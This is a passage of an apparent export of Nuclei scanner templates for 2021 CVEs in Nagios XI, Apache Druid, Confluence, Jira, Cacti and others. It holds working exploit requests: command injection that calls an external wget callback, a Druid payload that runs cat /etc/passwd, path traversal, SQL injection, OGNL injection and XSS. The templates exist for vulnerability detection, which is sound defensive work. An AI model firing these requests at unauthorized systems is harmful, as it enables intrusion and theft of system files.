\"wheel\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022024b1fa47aa40900fc6d2780d4b058e73c105e0afea27957c4b13eaa9d832e518022100b564558f8322ff1be933b2018a3a2ec91219e0e1399b633b02e3d65ea0349af4:922c64590222798bb761d5b6d8e72950", "hash": "d44042252df9c6e12c7854f3520ce01e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fc" }, "name": "CVE-2021-25296.yaml", "content": "id: CVE-2021-25296\n\ninfo:\n name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: |\n Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://github.com/rapid7/metasploit-framework/pull/17494\n - http://nagios.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25296\n - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25296\n cwe-id: CWE-78\n epss-score: 0.89514\n epss-percentile: 0.98511\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n - |\n GET /nagiosxi/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 20s\n GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body_4\n words:\n - \"Event Log\"\n - \"Display Name\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - \"name=['\\\"]nsp['\\\"] value=['\\\"](.*)['\\\"]>\"\n internal: true\n part: body\n\n - type: regex\n name: nsp_auth\n group: 1\n regex:\n - \"var nsp_str = ['\\\"](.*)['\\\"];\"\n internal: true\n part: body\n# digest: 490a0046304402206666d4036d4d35dab96e894b38ad9c5edf03bd115f6e5d9e2b93663420df328c0220408cb9f27506a076cc138fa9720eb3f0fc641f9eb0b01d3742742c5bc0c07c90:922c64590222798bb761d5b6d8e72950", "hash": "0d6cff145d41f96c565dd65e4279f8d1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fd" }, "name": "CVE-2021-25297.yaml", "content": "id: CVE-2021-25297\n\ninfo:\n name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: |\n Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://github.com/rapid7/metasploit-framework/pull/17494\n - http://nagios.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25297\n - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25297\n cwe-id: CWE-78\n epss-score: 0.90211\n epss-percentile: 0.98732\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n - |\n GET /nagiosxi/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 20s\n GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body_4\n words:\n - \"Ping\"\n - \"Switch Details\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - \"name=['\\\"]nsp['\\\"] value=['\\\"](.*)['\\\"]>\"\n internal: true\n part: body\n\n - type: regex\n name: nsp_auth\n group: 1\n regex:\n - \"var nsp_str = ['\\\"](.*)['\\\"];\"\n internal: true\n part: body\n# digest: 4a0a00473045022002c535c416c93bf3230b4b497297c11d4d1ee31297754e601903ba6730dfdae1022100a8503c90b036840ad6480ea87590c5fde3b4b3d809100390be430825d84803e6:922c64590222798bb761d5b6d8e72950", "hash": "8adca23915f67a00a39619ded4cc5e86", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fe" }, "name": "CVE-2021-25298.yaml", "content": "id: CVE-2021-25298\n\ninfo:\n name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection\n author: k0pak4\n severity: high\n description: |\n Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system.\n remediation: |\n Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://github.com/rapid7/metasploit-framework/pull/17494\n - http://nagios.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25298\n - http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25298\n cwe-id: CWE-78\n epss-score: 0.97349\n epss-percentile: 0.9988\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n - |\n GET /nagiosxi/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 20s\n GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body_4\n words:\n - \"Connection Information\"\n - \"Host Check\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - \"name=['\\\"]nsp['\\\"] value=['\\\"](.*)['\\\"]>\"\n internal: true\n part: body\n\n - type: regex\n name: nsp_auth\n group: 1\n regex:\n - \"var nsp_str = ['\\\"](.*)['\\\"];\"\n internal: true\n part: body\n# digest: 4a0a0047304502207ffbd21c262951d6e67fbd7d2e110f6b43874fabb78cfbc0af65808cacffb342022100d72430ef1b99310c8ea24fa8e2fc77ed72875051b2f4d657e42cd2c2244c5630:922c64590222798bb761d5b6d8e72950", "hash": "0a2624fe718894db0126ee14ed6512d3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ff" }, "name": "CVE-2021-25299.yaml", "content": "id: CVE-2021-25299\n\ninfo:\n name: Nagios XI 5.7.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Nagios XI 5.7.5 contains a cross-site scripting vulnerability in the file /usr/local/nagiosxi/html/admin/sshterm.php, due to improper sanitization of user-controlled input. A maliciously crafted URL, when clicked by an admin user, can be used to steal session cookies, or it can be chained with the previous bugs to get one-click remote command execution on the Nagios XI server.\n remediation: |\n Upgrade Nagios XI to the latest version or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md#cve-2021-25299\n - http://nagios.com\n - https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25299\n - https://assets.nagios.com/downloads/nagiosxi/versions.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25299\n cwe-id: CWE-79\n epss-score: 0.96845\n epss-percentile: 0.99634\n cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: nagios\n product: nagios_xi\n shodan-query: title:\"Nagios XI\"\n tags: cve2021,cve,nagios,nagiosxi,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n - |\n GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(header_3, 'text/html')\"\n - \"status_code_3 == 200\"\n - 'contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")'\n condition: and\n\n extractors:\n - type: regex\n name: nsp\n group: 1\n regex:\n - 'name=\"nsp\" value=\"(.*)\">'\n internal: true\n part: body\n# digest: 4b0a00483046022100d689aec24e353a8512a7a711f112d6a15becf87f58a454eef3116dbbe9f8d432022100c4b79ea5049b4b480e421cafdc165fe61ba55a10946eb5d9f61ce59d1ef8f5ad:922c64590222798bb761d5b6d8e72950", "hash": "838e6cc4d9e2331694fc5b08d3ba9799", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308300" }, "name": "CVE-2021-25646.yaml", "content": "id: CVE-2021-25646\n\ninfo:\n name: Apache Druid - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Apache Druid.\n reference:\n - https://paper.seebug.org/1476/\n - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E\n - http://www.openwall.com/lists/oss-security/2021/01/29/6\n - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25864\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25646\n cwe-id: CWE-732\n epss-score: 0.97323\n epss-percentile: 0.99871\n cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: druid\n tags: cve2021,cve,apache,rce,druid\n\nhttp:\n - raw:\n - |\n POST /druid/indexer/v1/sampler HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"type\":\"index\",\n \"spec\":{\n \"ioConfig\":{\n \"type\":\"index\",\n \"firehose\":{\n \"type\":\"local\",\n \"baseDir\":\"/etc\",\n \"filter\":\"passwd\"\n }\n },\n \"dataSchema\":{\n \"dataSource\":\"odgjxrrrePz\",\n \"parser\":{\n \"parseSpec\":{\n \"format\":\"javascript\",\n \"timestampSpec\":{\n\n },\n \"dimensionsSpec\":{\n\n },\n \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n \"\":{\n \"enabled\":\"true\"\n }\n }\n }\n }\n },\n \"samplerConfig\":{\n \"numRows\":10\n }\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"numRowsRead\"\n - \"numRowsIndexed\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200fb9d98df795d9808e6862bf4bd9bcb07827c6485050f18ef70a560a6f72c59202206fcce136e7f27d758cba9d444d64704b998c3469b1ee42efdd81942157b76359:922c64590222798bb761d5b6d8e72950", "hash": "c2eed2bb1cc5cc45daf7563e327b96ec", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308301" }, "name": "CVE-2021-25864.yaml", "content": "id: CVE-2021-25864\n\ninfo:\n name: Hue Magic 3.0.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: |\n Apply the latest security patch or update to a non-vulnerable version of Hue Magic.\n reference:\n - https://github.com/Foddy/node-red-contrib-huemagic/issues/217\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25864\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-25864\n cwe-id: CWE-22\n epss-score: 0.29108\n epss-percentile: 0.96769\n cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: dgtl\n product: huemagic\n framework: node.js\n shodan-query: title:\"NODE-RED\"\n tags: cve2021,cve,huemagic,lfi,dgtl,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220232dad6106246e48af27d4140906ad837429c3773f1b6f07ea2a498658394780022100a679963118929eb91997fffc431f95c3fad89464666e87470d287e74825577a7:922c64590222798bb761d5b6d8e72950", "hash": "bcb347565108aee275d760e5789102a0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308302" }, "name": "CVE-2021-25899.yaml", "content": "id: CVE-2021-25899\n\ninfo:\n name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection\n author: edoardottt\n severity: high\n description: |\n Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.\n reference:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25899\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-25899\n cwe-id: CWE-89\n epss-score: 0.50721\n epss-percentile: 0.9747\n cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: void\n product: aurall_rec_monitor\n shodan-query: html:\"AURALL\"\n tags: cve2021,cve,sqli,void,aurall\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy¶m2=test\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Contacte con el administrador\")'\n condition: and\n# digest: 4a0a004730450220032725c31303f01d831554ead8dfbb845e5e5324a12f8fa5b6a83b473c5e565002210094b392e00a4f07522830b49db305a4c03bd5d331a4b9fb5384ab046552e98b77:922c64590222798bb761d5b6d8e72950", "hash": "49449131a51aad489848245a8b2a6a8b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308303" }, "name": "CVE-2021-26084.yaml", "content": "id: CVE-2021-26084\n\ninfo:\n name: Confluence Server - Remote Code Execution\n author: dhiyaneshDk,philippedelteil\n severity: critical\n description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://jira.atlassian.com/browse/CONFSERVER-67940\n - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26084\n - https://github.com/Udyz/CVE-2021-26084\n - https://github.com/0xsyr0/OSCP\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-26084\n cwe-id: CWE-917\n epss-score: 0.97414\n epss-percentile: 0.99924\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 13\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian\n\nhttp:\n - raw:\n - |\n POST /{{path}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n\n payloads:\n path:\n - pages/createpage-entervariables.action?SpaceKey=x\n - pages/createpage-entervariables.action\n - confluence/pages/createpage-entervariables.action?SpaceKey=x\n - confluence/pages/createpage-entervariables.action\n - wiki/pages/createpage-entervariables.action?SpaceKey=x\n - wiki/pages/createpage-entervariables.action\n - pages/doenterpagevariables.action\n - pages/createpage.action?spaceKey=myproj\n - pages/templates2/viewpagetemplate.action\n - pages/createpage-entervariables.action\n - template/custom/content-editor\n - templates/editor-preload-container\n - users/user-dark-features\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"aaaa{140592=null}'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205f134a1bb31a5f1819448929d1f5a1fb7607689bb3287e0c57970f3ed9b28dff0220487bb1df45ffa1fcc0ccf07cee500d7a022f69f26bd37a565410b759560a2ea0:922c64590222798bb761d5b6d8e72950", "hash": "ebb7d32091893d779194a07099d2a14d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308304" }, "name": "CVE-2021-26085.yaml", "content": "id: CVE-2021-26085\n\ninfo:\n name: Atlassian Confluence Server - Local File Inclusion\n author: princechaddha\n severity: medium\n description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Apply the latest security patches provided by Atlassian to fix the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html\n - https://jira.atlassian.com/browse/CONFSERVER-67893\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26085\n - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-26085\n cwe-id: CWE-425\n epss-score: 0.96595\n epss-percentile: 0.99535\n cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: confluence_data_center\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - Confluence\n - com.atlassian.confluence.setup.ConfluenceAppConfig\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220670cb57e3fae58b67b36bab6ba5d2bc561838e5acd2e94af09eb440761a29dc002201569feec0d7b5543989deae7767a3f8feb7b44f81658e35a09cfffb100e2119c:922c64590222798bb761d5b6d8e72950", "hash": "bafa18a29d435075dc54104e294aa8c6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308305" }, "name": "CVE-2021-26086.yaml", "content": "id: CVE-2021-26086\n\ninfo:\n name: Atlassian Jira Limited - Local File Inclusion\n author: cocxanh\n severity: medium\n description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.\n impact: |\n This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system.\n remediation: |\n Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-72695\n - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26086\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/Jeromeyoung/CVE-2021-26086\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-26086\n cwe-id: CWE-22\n epss-score: 0.54993\n epss-percentile: 0.97368\n cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: jira_data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210087c8cc23306c003d3014cabcd4c3cb912e3c4d87482a41215320d2f95b58eda30221009c6e8471eaa49ae0b54f6509e968ff4afd28159693426f81124b8e14abc37fa6:922c64590222798bb761d5b6d8e72950", "hash": "a4248fe9b1a884f197b5ce412c5cb2f5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308306" }, "name": "CVE-2021-26247.yaml", "content": "id: CVE-2021-26247\n\ninfo:\n name: Cacti - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: Cacti contains a cross-site scripting vulnerability via \"http:///auth_changepassword.php?ref=\" which can successfully execute the JavaScript payload present in the \"ref\" URL parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability.\n reference:\n - https://www.cacti.net/info/changelog\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26247\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26247\n cwe-id: CWE-79\n epss-score: 0.00255\n epss-percentile: 0.647\n cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cacti\n product: cacti\n tags: cve,cve2021,cacti,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e338922cb8b551aff81b4174eeb54b3d03de0063dcba852a37d9e56fca5b6aac022100889322591e888230de5003fd765440786e4839255f6b01983ec19666b8e127f5:922c64590222798bb761d5b6d8e72950", "hash": "4c09db2ae2f1d3b1758e3b610e82d37c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308307" }, "name": "CVE-2021-26292.yaml", "content": "id: CVE-2021-26292\n\ninfo:\n name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure\n author: johnk3r\n severity: low\n description: |\n AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.\n reference:\n - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26292\n classification:\n cve-id: CVE-2021-26292\n metadata:\n verified: true\n max-request: 1\n vendor: AfterLogic\n product: AfterLogic Aurora & WebMail\n fofa-query: \"X-Server: AfterlogicDAVServer\"\n tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic\n\nhttp:\n - raw:\n - |\n 